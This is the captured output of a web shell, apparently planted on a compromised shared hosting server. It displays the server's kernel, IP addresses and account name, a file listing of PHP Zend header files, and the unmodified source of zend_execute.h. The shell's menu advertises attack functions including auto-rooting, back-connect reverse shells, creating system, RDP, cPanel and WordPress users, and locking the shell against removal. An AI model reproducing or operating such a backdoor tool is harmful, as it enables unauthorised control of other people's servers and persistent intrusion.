Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.145.9.200
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
php51 /
usr /
include /
php /
Zend /
[ HOME SHELL ]
Name
Size
Permission
Action
FlexLexer.h
5.61
KB
-rw-r--r--
acconfig.h
3.22
KB
-rw-r--r--
zend.h
20.45
KB
-rw-r--r--
zend_API.h
31.73
KB
-rw-r--r--
zend_alloc.h
9.03
KB
-rw-r--r--
zend_builtin_functions.h
1.65
KB
-rw-r--r--
zend_compile.h
25.25
KB
-rw-r--r--
zend_config.h
107
B
-rw-r--r--
zend_config.nw.h
2.5
KB
-rw-r--r--
zend_config.w32.h
3.06
KB
-rw-r--r--
zend_constants.h
4.06
KB
-rw-r--r--
zend_dynamic_array.h
1.92
KB
-rw-r--r--
zend_errors.h
2
KB
-rw-r--r--
zend_exceptions.h
2.65
KB
-rw-r--r--
zend_execute.h
7.22
KB
-rw-r--r--
zend_extensions.h
4.32
KB
-rw-r--r--
zend_fast_cache.h
4.07
KB
-rw-r--r--
zend_globals.h
7.3
KB
-rw-r--r--
zend_globals_macros.h
3.37
KB
-rw-r--r--
zend_hash.h
15.93
KB
-rw-r--r--
zend_highlight.h
2.47
KB
-rw-r--r--
zend_indent.h
1.49
KB
-rw-r--r--
zend_ini.h
9.17
KB
-rw-r--r--
zend_ini_parser.h
2.32
KB
-rw-r--r--
zend_ini_scanner.h
1.73
KB
-rw-r--r--
zend_interfaces.h
2.73
KB
-rw-r--r--
zend_istdiostream.h
1.67
KB
-rw-r--r--
zend_iterators.h
3.8
KB
-rw-r--r--
zend_language_parser.h
7.39
KB
-rw-r--r--
zend_language_scanner.h
2.31
KB
-rw-r--r--
zend_list.h
4.6
KB
-rw-r--r--
zend_llist.h
3.94
KB
-rw-r--r--
zend_mm.h
2.6
KB
-rw-r--r--
zend_modules.h
4.59
KB
-rw-r--r--
zend_multibyte.h
3.61
KB
-rw-r--r--
zend_multiply.h
2.05
KB
-rw-r--r--
zend_object_handlers.h
7.9
KB
-rw-r--r--
zend_objects.h
2.22
KB
-rw-r--r--
zend_objects_API.h
3.69
KB
-rw-r--r--
zend_operators.h
11.07
KB
-rw-r--r--
zend_ptr_stack.h
3.92
KB
-rw-r--r--
zend_qsort.h
1.48
KB
-rw-r--r--
zend_stack.h
2.34
KB
-rw-r--r--
zend_static_allocator.h
1.88
KB
-rw-r--r--
zend_stream.h
2.48
KB
-rw-r--r--
zend_strtod.h
1.45
KB
-rw-r--r--
zend_ts_hash.h
6.77
KB
-rw-r--r--
zend_types.h
1.8
KB
-rw-r--r--
zend_variables.h
3.78
KB
-rw-r--r--
zend_vm.h
1.4
KB
-rw-r--r--
zend_vm_def.h
106.47
KB
-rw-r--r--
zend_vm_execute.h
875.52
KB
-rw-r--r--
zend_vm_opcodes.h
6.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : zend_execute.h
/* +----------------------------------------------------------------------+ | Zend Engine | +----------------------------------------------------------------------+ | Copyright (c) 1998-2006 Zend Technologies Ltd. (http://www.zend.com) | +----------------------------------------------------------------------+ | This source file is subject to version 2.00 of the Zend license, | | that is bundled with this package in the file LICENSE, and is | | available through the world-wide-web at the following url: | | http://www.zend.com/license/2_00.txt. | | If you did not receive a copy of the Zend license and are unable to | | obtain it through the world-wide-web, please send a note to | | license@zend.com so we can mail you a copy immediately. | +----------------------------------------------------------------------+ | Authors: Andi Gutmans <andi@zend.com> | | Zeev Suraski <zeev@zend.com> | +----------------------------------------------------------------------+ */ /* $Id: zend_execute.h,v 1.84.2.4 2006/01/04 23:53:04 andi Exp $ */ #ifndef ZEND_EXECUTE_H #define ZEND_EXECUTE_H #include "zend_compile.h" #include "zend_hash.h" #include "zend_variables.h" #include "zend_operators.h" typedef union _temp_variable { zval tmp_var; struct { zval **ptr_ptr; zval *ptr; zend_bool fcall_returned_reference; } var; struct { zval **ptr_ptr; zval *ptr; zend_bool fcall_returned_reference; zval *str; zend_uint offset; } str_offset; zend_class_entry *class_entry; } temp_variable; BEGIN_EXTERN_C() ZEND_API extern void (*zend_execute)(zend_op_array *op_array TSRMLS_DC); ZEND_API extern void (*zend_execute_internal)(zend_execute_data *execute_data_ptr, int return_value_used TSRMLS_DC); void init_executor(TSRMLS_D); void shutdown_executor(TSRMLS_D); void shutdown_destructors(TSRMLS_D); ZEND_API void execute(zend_op_array *op_array TSRMLS_DC); ZEND_API void execute_internal(zend_execute_data *execute_data_ptr, int return_value_used TSRMLS_DC); ZEND_API int zend_is_true(zval *op); #define safe_free_zval_ptr(p) safe_free_zval_ptr_rel(p ZEND_FILE_LINE_CC ZEND_FILE_LINE_EMPTY_CC) static inline void safe_free_zval_ptr_rel(zval *p ZEND_FILE_LINE_DC ZEND_FILE_LINE_ORIG_DC) { TSRMLS_FETCH(); if (p!=EG(uninitialized_zval_ptr)) { FREE_ZVAL_REL(p); } } ZEND_API int zend_lookup_class(char *name, int name_length, zend_class_entry ***ce TSRMLS_DC); ZEND_API int zend_lookup_class_ex(char *name, int name_length, int use_autoload, zend_class_entry ***ce TSRMLS_DC); ZEND_API int zend_eval_string(char *str, zval *retval_ptr, char *string_name TSRMLS_DC); ZEND_API int zend_eval_string_ex(char *str, zval *retval_ptr, char *string_name, int handle_exceptions TSRMLS_DC); static inline int i_zend_is_true(zval *op) { int result; switch (op->type) { case IS_NULL: result = 0; break; case IS_LONG: case IS_BOOL: case IS_RESOURCE: result = (op->value.lval?1:0); break; case IS_DOUBLE: result = (op->value.dval ? 1 : 0); break; case IS_STRING: if (op->value.str.len == 0 || (op->value.str.len==1 && op->value.str.val[0]=='0')) { result = 0; } else { result = 1; } break; case IS_ARRAY: result = (zend_hash_num_elements(op->value.ht)?1:0); break; case IS_OBJECT: if(IS_ZEND_STD_OBJECT(*op)) { TSRMLS_FETCH(); if (Z_OBJ_HT_P(op)->cast_object) { zval tmp; if (Z_OBJ_HT_P(op)->cast_object(op, &tmp, IS_BOOL, 0 TSRMLS_CC) == SUCCESS) { result = Z_LVAL(tmp); break; } } else if (Z_OBJ_HT_P(op)->get) { zval *tmp = Z_OBJ_HT_P(op)->get(op TSRMLS_CC); if(Z_TYPE_P(tmp) != IS_OBJECT) { /* for safety - avoid loop */ convert_to_boolean(tmp); result = Z_LVAL_P(tmp); zval_ptr_dtor(&tmp); break; } } if(EG(ze1_compatibility_mode)) { result = (zend_hash_num_elements(Z_OBJPROP_P(op))?1:0); } else { result = 1; } } else { result = 1; } break; default: result = 0; break; } return result; } ZEND_API int zval_update_constant(zval **pp, void *arg TSRMLS_DC); /* dedicated Zend executor functions - do not use! */ static inline void zend_ptr_stack_clear_multiple(TSRMLS_D) { void **p = EG(argument_stack).top_element-2; int delete_count = (ulong) *p; EG(argument_stack).top -= (delete_count+2); while (--delete_count>=0) { zval_ptr_dtor((zval **) --p); } EG(argument_stack).top_element = p; } static inline int zend_ptr_stack_get_arg(int requested_arg, void **data TSRMLS_DC) { void **p = EG(argument_stack).top_element-2; int arg_count = (ulong) *p; if (requested_arg>arg_count) { return FAILURE; } *data = (p-arg_count+requested_arg-1); return SUCCESS; } void execute_new_code(TSRMLS_D); /* services */ ZEND_API char *get_active_class_name(char **space TSRMLS_DC); ZEND_API char *get_active_function_name(TSRMLS_D); ZEND_API char *zend_get_executed_filename(TSRMLS_D); ZEND_API uint zend_get_executed_lineno(TSRMLS_D); ZEND_API zend_bool zend_is_executing(TSRMLS_D); ZEND_API void zend_set_timeout(long seconds); ZEND_API void zend_unset_timeout(TSRMLS_D); ZEND_API void zend_timeout(int dummy); ZEND_API zend_class_entry *zend_fetch_class(char *class_name, uint class_name_len, int fetch_type TSRMLS_DC); void zend_verify_abstract_class(zend_class_entry *ce TSRMLS_DC); #ifdef ZEND_WIN32 void zend_init_timeout_thread(); void zend_shutdown_timeout_thread(); #define WM_REGISTER_ZEND_TIMEOUT (WM_USER+1) #define WM_UNREGISTER_ZEND_TIMEOUT (WM_USER+2) #endif #define zendi_zval_copy_ctor(p) zval_copy_ctor(&(p)) #define zendi_zval_dtor(p) zval_dtor(&(p)) #define active_opline (*EG(opline_ptr)) /* The following tries to resolve the classname of a zval of type object. * Since it is slow it should be only used in error messages. */ #define Z_OBJ_CLASS_NAME_P(zval) ((zval) && (zval)->type == IS_OBJECT && Z_OBJ_HT_P(zval)->get_class_entry != NULL && Z_OBJ_HT_P(zval)->get_class_entry(zval TSRMLS_CC) ? Z_OBJ_HT_P(zval)->get_class_entry(zval TSRMLS_CC)->name : "") ZEND_API zval** zend_get_compiled_variable_value(zend_execute_data *execute_data_ptr, zend_uint var); #define ZEND_USER_OPCODE_CONTINUE 0 /* execute next opcode */ #define ZEND_USER_OPCODE_RETURN 1 /* exit from executor (return from function) */ #define ZEND_USER_OPCODE_DISPATCH 2 /* call original opcode handler */ #define ZEND_USER_OPCODE_DISPATCH_TO 0x100 /* call original handler of returned opcode */ ZEND_API int zend_set_user_opcode_handler(zend_uchar opcode, opcode_handler_t handler); ZEND_API opcode_handler_t zend_get_user_opcode_handler(zend_uchar opcode); /* former zend_execute_locks.h */ typedef struct _zend_free_op { zval* var; /* int is_var; */ } zend_free_op; ZEND_API zval *zend_get_zval_ptr(znode *node, temp_variable *Ts, zend_free_op *should_free, int type TSRMLS_DC); ZEND_API zval **zend_get_zval_ptr_ptr(znode *node, temp_variable *Ts, zend_free_op *should_free, int type TSRMLS_DC); ZEND_API int zend_do_fcall(ZEND_OPCODE_HANDLER_ARGS); END_EXTERN_C() #endif /* ZEND_EXECUTE_H */ /* * Local variables: * tab-width: 4 * c-basic-offset: 4 * indent-tabs-mode: t * End: */
Close